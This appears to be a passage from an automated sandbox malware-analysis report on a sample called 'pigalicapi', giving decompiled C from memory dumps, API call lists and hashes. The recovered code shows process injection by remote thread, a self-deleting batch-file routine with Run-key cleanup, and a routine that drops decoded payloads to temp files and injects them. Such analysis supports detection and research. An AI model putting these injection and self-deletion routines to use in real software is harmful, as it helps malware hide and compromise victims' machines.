                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008D30
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008D68
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$ContextHash$AcquireDestroy$CreateDataDecryptDeriveErrorLastRelease
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 3718126946-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
                                                                                                                                                                                                                                                                          • Instruction ID: a60922051ccac58686ce7bb6d252e90d8c3d4a9338f0118c5879c090c3d284f0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71c9adc9b467ae165da43e1669a7b73bdd10744fd139576a6c229d191573f996
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5311B75A44209EBFB58DFA4C849BAE77B9FB44704F10C628F601B61C0D7B8A984CF60
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                          			E04002510(void* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                          				void* _v32;
                                                                                                                                                                                                                                                                          				signed int _v36;
                                                                                                                                                                                                                                                                          				void* _t138;
                                                                                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                          					L14:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v24 = _a8 +  *((intOrPtr*)(_a8 + 0x3c));
                                                                                                                                                                                                                                                                          					_v20 = _v24 + ( *(_v24 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                                                                                                                                                                                          					_v12 =  *((intOrPtr*)(_v24 + 0x50));
                                                                                                                                                                                                                                                                          					_v16 = VirtualAlloc(0, _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                          					if(_v16 != 0) {
                                                                                                                                                                                                                                                                          						_v32 = VirtualAllocEx(_a4,  *(_v24 + 0x34), _v12, 0x3000, 0x40);
                                                                                                                                                                                                                                                                          						if(_v32 != 0) {
                                                                                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                                                                                          							E04007B70(_v16, _a8,  *((intOrPtr*)(_v24 + 0x54)));
                                                                                                                                                                                                                                                                          							_t139 = _t138 + 0xc;
                                                                                                                                                                                                                                                                          							_v36 = 0;
                                                                                                                                                                                                                                                                          							while(_v36 < ( *(_v24 + 6) & 0x0000ffff)) {
                                                                                                                                                                                                                                                                          								E04007B70(_v16 +  *((intOrPtr*)(_v20 + 0xc + _v36 * 0x28)), _a8 +  *((intOrPtr*)(_v20 + 0x14 + _v36 * 0x28)),  *((intOrPtr*)(_v20 + 0x10 + _v36 * 0x28)));
                                                                                                                                                                                                                                                                          								_t139 = _t139 + 0xc;
                                                                                                                                                                                                                                                                          								_v36 = _v36 + 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							E040026D0(_v16, _v32);
                                                                                                                                                                                                                                                                          							if(WriteProcessMemory(_a4, _v32, _v16, _v12, 0) != 0) {
                                                                                                                                                                                                                                                                          								VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                          								_v28 = 0;
                                                                                                                                                                                                                                                                          								_v8 = CreateRemoteThread(_a4, 0, 0, _v32 +  *((intOrPtr*)(_v24 + 0x28)), 0x11, 0,  &_v28);
                                                                                                                                                                                                                                                                          								goto L14;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v32 = VirtualAllocEx(_a4, 0, _v12, 0x103000, 0x40);
                                                                                                                                                                                                                                                                          						if(_v32 != 0) {
                                                                                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						VirtualFree(_v16, 0, 0x8000);
                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                                                          0x04002516
                                                                                                                                                                                                                                                                          0x04002521
                                                                                                                                                                                                                                                                          0x040026c2
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002531
                                                                                                                                                                                                                                                                          0x0400253a
                                                                                                                                                                                                                                                                          0x0400254b
                                                                                                                                                                                                                                                                          0x04002554
                                                                                                                                                                                                                                                                          0x0400256a
                                                                                                                                                                                                                                                                          0x04002571
                                                                                                                                                                                                                                                                          0x04002596
                                                                                                                                                                                                                                                                          0x0400259d
                                                                                                                                                                                                                                                                          0x040025d7
                                                                                                                                                                                                                                                                          0x040025e6
                                                                                                                                                                                                                                                                          0x040025eb
                                                                                                                                                                                                                                                                          0x040025ee
                                                                                                                                                                                                                                                                          0x04002600
                                                                                                                                                                                                                                                                          0x0400263c
                                                                                                                                                                                                                                                                          0x04002641
                                                                                                                                                                                                                                                                          0x040025fd
                                                                                                                                                                                                                                                                          0x040025fd
                                                                                                                                                                                                                                                                          0x0400264e
                                                                                                                                                                                                                                                                          0x04002670
                                                                                                                                                                                                                                                                          0x04002692
                                                                                                                                                                                                                                                                          0x04002698
                                                                                                                                                                                                                                                                          0x040026bf
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040026bf
                                                                                                                                                                                                                                                                          0x0400267d
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002683
                                                                                                                                                                                                                                                                          0x040025b6
                                                                                                                                                                                                                                                                          0x040025bd
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040025ca
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x040025d0
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04002573

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 04002564
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00003000,00000040), ref: 04002590
                                                                                                                                                                                                                                                                          • VirtualAllocEx.KERNEL32(00000000,00000000,00000000,00103000,00000040), ref: 040025B0
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040025CA
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Virtual$Alloc$Free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3668210933-0
                                                                                                                                                                                                                                                                          • Opcode ID: 7b5e2a0a0879127798f9ea868be388b8c75a87b6f8ac87fe0ac4160dfdf198bf
                                                                                                                                                                                                                                                                          • Instruction ID: c64b90f60543cdd9f1b152a56a7e8b33ad9649d5cc2119a14d9a029aa2c63625
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b5e2a0a0879127798f9ea868be388b8c75a87b6f8ac87fe0ac4160dfdf198bf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0510D75E00209AFEB18DF94C895FAEB7B5FB48305F10C558E615BB280D778A981CB64
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                                                                                          			E040074A0() {
                                                                                                                                                                                                                                                                          				char _v524;
                                                                                                                                                                                                                                                                          				CHAR* _v528;
                                                                                                                                                                                                                                                                          				void* _v532;
                                                                                                                                                                                                                                                                          				void* _v536;
                                                                                                                                                                                                                                                                          				void* _v540;
                                                                                                                                                                                                                                                                          				char _v1060;
                                                                                                                                                                                                                                                                          				char _v1580;
                                                                                                                                                                                                                                                                          				char _v2364;
                                                                                                                                                                                                                                                                          				long _v2368;
                                                                                                                                                                                                                                                                          				struct _PROCESS_INFORMATION _v2384;
                                                                                                                                                                                                                                                                          				long _v2388;
                                                                                                                                                                                                                                                                          				struct _STARTUPINFOA _v2460;
                                                                                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                                                                                          				void* _t121;
                                                                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                                                                          				void* _t124;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				E04007D20(E04007D20( &_v2364,  &_v2364, 0, 0x30c),  &_v1060, 0, 0x208);
                                                                                                                                                                                                                                                                          				_t123 = _t121 + 0x18;
                                                                                                                                                                                                                                                                          				 *0x4014370 = 1;
                                                                                                                                                                                                                                                                          				Sleep(0x3e8);
                                                                                                                                                                                                                                                                          				if(( *0x4014362 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					_v2368 = 0x207;
                                                                                                                                                                                                                                                                          					if(( *0x401435a & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          						GetEnvironmentVariableA("USERPROFILE",  &_v1060, 0x207);
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						__imp__GetAllUsersProfileDirectoryA( &_v1060,  &_v2368);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					lstrcatA( &_v1060, "\\");
                                                                                                                                                                                                                                                                          					lstrcatA( &_v1060, "pigalicapi");
                                                                                                                                                                                                                                                                          					lstrcatA( &_v1060, ".exe");
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					GetModuleFileNameA(0,  &_v1060, 0x207);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				SetFileAttributesA( &_v1060, 0x80);
                                                                                                                                                                                                                                                                          				wnsprintfA( &_v2364, 0x30b, ":repeat\r\ndel %s\r\nif exist %s goto :repeat\r\ndel %%0",  &_v1060,  &_v1060);
                                                                                                                                                                                                                                                                          				_t124 = _t123 + 0x14;
                                                                                                                                                                                                                                                                          				if( *0x401436c != 0) {
                                                                                                                                                                                                                                                                          					_t86 =  *0x401436c; // 0x268
                                                                                                                                                                                                                                                                          					TerminateThread(_t86, 1);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v528 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                          				_v532 = 0x80000001;
                                                                                                                                                                                                                                                                          				if(( *0x401435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					_v532 = 0x80000002;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v536 = 0;
                                                                                                                                                                                                                                                                          				if(RegOpenKeyExA(_v532, _v528, 0, 2,  &_v536) == 0) {
                                                                                                                                                                                                                                                                          					RegDeleteValueA(_v536, "pigalicapi");
                                                                                                                                                                                                                                                                          					RegCloseKey(_v536);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				if(( *0x401435b & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          					E04005E30(1);
                                                                                                                                                                                                                                                                          					_t124 = _t124 + 4;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				GetEnvironmentVariableA("TEMP",  &_v1580, 0x104);
                                                                                                                                                                                                                                                                          				GetTempFileNameA( &_v1580, "slf", GetTickCount() % 0xffff,  &_v524);
                                                                                                                                                                                                                                                                          				lstrcatA( &_v524, ".bat");
                                                                                                                                                                                                                                                                          				_t71 = CreateFileA( &_v524, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                          				_v540 = _t71;
                                                                                                                                                                                                                                                                          				if(_v540 != 0xffffffff) {
                                                                                                                                                                                                                                                                          					_v2388 = 0;
                                                                                                                                                                                                                                                                          					WriteFile(_v540,  &_v2364, lstrlenA( &_v2364),  &_v2388, 0);
                                                                                                                                                                                                                                                                          					E04007D20(E04007D20(CloseHandle(_v540),  &_v2384, 0, 0x10),  &_v2460, 0, 0x44);
                                                                                                                                                                                                                                                                          					_v2460.cb = 0x44;
                                                                                                                                                                                                                                                                          					_v2460.dwFlags = _v2460.dwFlags | 0x00000001;
                                                                                                                                                                                                                                                                          					_v2460.wShowWindow = 0;
                                                                                                                                                                                                                                                                          					if(CreateProcessA(0,  &_v524, 0, 0, 0, 0, 0, 0,  &_v2460,  &_v2384) != 0) {
                                                                                                                                                                                                                                                                          						_t71 = CloseHandle(_v2384.hThread);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					ExitProcess(0);
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				return _t71;
                                                                                                                                                                                                                                                                          			}



















                                                                                                                                                                                                                                                                          0x040074cd
                                                                                                                                                                                                                                                                          0x040074d2
                                                                                                                                                                                                                                                                          0x040074d5
                                                                                                                                                                                                                                                                          0x040074e4
                                                                                                                                                                                                                                                                          0x040074f3
                                                                                                                                                                                                                                                                          0x0400750b
                                                                                                                                                                                                                                                                          0x0400751e
                                                                                                                                                                                                                                                                          0x04007547
                                                                                                                                                                                                                                                                          0x04007520
                                                                                                                                                                                                                                                                          0x0400752e
                                                                                                                                                                                                                                                                          0x0400752e
                                                                                                                                                                                                                                                                          0x04007559
                                                                                                                                                                                                                                                                          0x0400756b
                                                                                                                                                                                                                                                                          0x0400757d
                                                                                                                                                                                                                                                                          0x040074f5
                                                                                                                                                                                                                                                                          0x04007503
                                                                                                                                                                                                                                                                          0x04007503
                                                                                                                                                                                                                                                                          0x0400758f
                                                                                                                                                                                                                                                                          0x040075b4
                                                                                                                                                                                                                                                                          0x040075ba
                                                                                                                                                                                                                                                                          0x040075c4
                                                                                                                                                                                                                                                                          0x040075c8
                                                                                                                                                                                                                                                                          0x040075ce
                                                                                                                                                                                                                                                                          0x040075ce
                                                                                                                                                                                                                                                                          0x040075d4
                                                                                                                                                                                                                                                                          0x040075de
                                                                                                                                                                                                                                                                          0x040075f1
                                                                                                                                                                                                                                                                          0x040075f3
                                                                                                                                                                                                                                                                          0x040075f3
                                                                                                                                                                                                                                                                          0x040075fd
                                                                                                                                                                                                                                                                          0x04007628
                                                                                                                                                                                                                                                                          0x04007636
                                                                                                                                                                                                                                                                          0x04007643
                                                                                                                                                                                                                                                                          0x04007643
                                                                                                                                                                                                                                                                          0x04007652
                                                                                                                                                                                                                                                                          0x04007656
                                                                                                                                                                                                                                                                          0x0400765b
                                                                                                                                                                                                                                                                          0x0400765b
                                                                                                                                                                                                                                                                          0x0400766f
                                                                                                                                                                                                                                                                          0x04007698
                                                                                                                                                                                                                                                                          0x040076aa
                                                                                                                                                                                                                                                                          0x040076c6
                                                                                                                                                                                                                                                                          0x040076cc
                                                                                                                                                                                                                                                                          0x040076d9
                                                                                                                                                                                                                                                                          0x040076df
                                                                                                                                                                                                                                                                          0x0400770e
                                                                                                                                                                                                                                                                          0x0400773f
                                                                                                                                                                                                                                                                          0x04007747
                                                                                                                                                                                                                                                                          0x0400775a
                                                                                                                                                                                                                                                                          0x04007762
                                                                                                                                                                                                                                                                          0x04007794
                                                                                                                                                                                                                                                                          0x0400779d
                                                                                                                                                                                                                                                                          0x0400779d
                                                                                                                                                                                                                                                                          0x040077a5
                                                                                                                                                                                                                                                                          0x040077a5
                                                                                                                                                                                                                                                                          0x040077ae

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(000003E8), ref: 040074E4
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000207), ref: 04007503
                                                                                                                                                                                                                                                                          • GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 0400752E
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0400C650), ref: 04007559
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,pigalicapi), ref: 0400756B
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.exe), ref: 0400757D
                                                                                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 0400758F
                                                                                                                                                                                                                                                                          • wnsprintfA.SHLWAPI ref: 040075B4
                                                                                                                                                                                                                                                                          • TerminateThread.KERNEL32(00000268,00000001), ref: 040075CE
                                                                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,0400C690,00000000,00000002,00000000), ref: 04007620
                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(00000000,pigalicapi), ref: 04007636
                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 04007643
                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 0400766F
                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0400767C
                                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,slf,00000000), ref: 04007698
                                                                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,.bat), ref: 040076AA
                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 040076C6
                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,00000000), ref: 040076F9
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,00000000), ref: 0400770E
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 0400771B
                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0400778C
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0400779D
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 040077A5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteDirectoryEnvironmentExitModuleOpenProfileSleepTempTerminateThreadTickUsersValueVariableWritelstrlenwnsprintf
                                                                                                                                                                                                                                                                          • String ID: .bat$.exe$:repeatdel %sif exist %s goto :repeatdel %%0$D$TEMP$USERPROFILE$pigalicapi$slf
                                                                                                                                                                                                                                                                          • API String ID: 3221898725-336785456
                                                                                                                                                                                                                                                                          • Opcode ID: fa5edaca191c21db1bfd21e4a2ba9e4dafc3ba9ee2ebd150ac9fab347fea4d6a
                                                                                                                                                                                                                                                                          • Instruction ID: 33d1a80e31bd16fda39fb1d5e61c33b6d2d8e7faa3bd40571536c86a9d597677
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa5edaca191c21db1bfd21e4a2ba9e4dafc3ba9ee2ebd150ac9fab347fea4d6a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 277134B1A44318ABF7649F60DC49FEA7778EB44705F448698B209B60C1DBBCAA84CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                                                                                          			E04006DA0(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                          				intOrPtr* _v8;
                                                                                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _v40;
                                                                                                                                                                                                                                                                          				long _v44;
                                                                                                                                                                                                                                                                          				void* _v48;
                                                                                                                                                                                                                                                                          				void* _v52;
                                                                                                                                                                                                                                                                          				void* _v56;
                                                                                                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                                                                                                          				void* _v328;
                                                                                                                                                                                                                                                                          				char _v340;
                                                                                                                                                                                                                                                                          				char _v604;
                                                                                                                                                                                                                                                                          				long _v608;
                                                                                                                                                                                                                                                                          				int _v612;
                                                                                                                                                                                                                                                                          				long _v616;
                                                                                                                                                                                                                                                                          				void* _v620;
                                                                                                                                                                                                                                                                          				long _v624;
                                                                                                                                                                                                                                                                          				intOrPtr _v628;
                                                                                                                                                                                                                                                                          				void* _v632;
                                                                                                                                                                                                                                                                          				intOrPtr _t198;
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t217;
                                                                                                                                                                                                                                                                          				void* _t223;
                                                                                                                                                                                                                                                                          				struct _SECURITY_ATTRIBUTES* _t248;
                                                                                                                                                                                                                                                                          				void* _t347;
                                                                                                                                                                                                                                                                          				void* _t349;
                                                                                                                                                                                                                                                                          				void* _t350;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = _a4;
                                                                                                                                                                                                                                                                          				if(_v8 == 0) {
                                                                                                                                                                                                                                                                          					L39:
                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				Sleep( *(_v8 + 0x14) * 0x3c * 0x3e8);
                                                                                                                                                                                                                                                                          				__imp__CoInitialize(0);
                                                                                                                                                                                                                                                                          				_v32 =  *_v8;
                                                                                                                                                                                                                                                                          				_v28 =  *((intOrPtr*)(_v8 + 4));
                                                                                                                                                                                                                                                                          				_v24 =  *((intOrPtr*)(_v8 + 8));
                                                                                                                                                                                                                                                                          				_v12 =  *(_v8 + 0x14);
                                                                                                                                                                                                                                                                          				_v20 =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                          				_v16 =  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                                                                                                                          				if(( *(_v8 + 0xc) & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                          					GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                          					E04007D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                          					E04009730( &_v340, 4);
                                                                                                                                                                                                                                                                          					_t349 = _t347 + 0x14;
                                                                                                                                                                                                                                                                          					GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                          					_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                          					if(_v328 != 0xffffffff) {
                                                                                                                                                                                                                                                                          						_v608 = 0;
                                                                                                                                                                                                                                                                          						_v612 = 0;
                                                                                                                                                                                                                                                                          						_v616 =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                          						if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          							_v612 = WriteFile(_v328,  *(_v8 + 0x18),  *(_v8 + 0x1c),  &_v608, 0);
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v624 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                          							_v620 = VirtualAlloc(0, _v624, 0x3000, 4);
                                                                                                                                                                                                                                                                          							if(_v620 != 0) {
                                                                                                                                                                                                                                                                          								if(E04006260(_v8,  *(_v8 + 0x18),  *(_v8 + 0x1c), _v620, _v624) == _v624) {
                                                                                                                                                                                                                                                                          									_v612 = WriteFile(_v328, _v620, _v624,  &_v608, 0);
                                                                                                                                                                                                                                                                          									_v616 = _v624;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								VirtualFree(_v620, 0, 0x8000);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CloseHandle(_v328);
                                                                                                                                                                                                                                                                          						if(_v612 != 0 && _v608 == _v616) {
                                                                                                                                                                                                                                                                          							_t198 = E04001E60( &_v324);
                                                                                                                                                                                                                                                                          							_t350 = _t349 + 4;
                                                                                                                                                                                                                                                                          							_v628 = _t198;
                                                                                                                                                                                                                                                                          							if(_v628 != 0) {
                                                                                                                                                                                                                                                                          								if( *((intOrPtr*)(_v8 + 0x10)) != 0) {
                                                                                                                                                                                                                                                                          									E040073C0( &_v32,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                          									_t350 = _t350 + 0xc;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                          									E04002510(_v628, 0x400e290);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L38:
                                                                                                                                                                                                                                                                          					__imp__CoUninitialize();
                                                                                                                                                                                                                                                                          					goto L39;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				_v40 = 0;
                                                                                                                                                                                                                                                                          				_v36 = 0;
                                                                                                                                                                                                                                                                          				_v44 = 0;
                                                                                                                                                                                                                                                                          				if(( *(_v8 + 0xc) & 0x00000010) == 0) {
                                                                                                                                                                                                                                                                          					_t217 = E04002070( *(_v8 + 0x18));
                                                                                                                                                                                                                                                                          					_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                          					_v40 = _t217;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v44 =  *((intOrPtr*)( *(_v8 + 0x1c) +  *(_v8 + 0x18) - 4));
                                                                                                                                                                                                                                                                          					_v48 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                          					if(_v48 != 0) {
                                                                                                                                                                                                                                                                          						if(E04006260( *(_v8 + 0x1c),  *(_v8 + 0x18),  *(_v8 + 0x1c), _v48, _v44) == _v44) {
                                                                                                                                                                                                                                                                          							_t248 = E04002070(_v48);
                                                                                                                                                                                                                                                                          							_t347 = _t347 + 4;
                                                                                                                                                                                                                                                                          							_v40 = _t248;
                                                                                                                                                                                                                                                                          							if(( *(_v8 + 0xc) & 0x00000008) != 0) {
                                                                                                                                                                                                                                                                          								_v36 = VirtualAlloc(0, _v44, 0x3000, 4);
                                                                                                                                                                                                                                                                          								E04007B70(_v36, _v48, _v44);
                                                                                                                                                                                                                                                                          								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						VirtualFree(_v48, 0, 0x8000);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				}
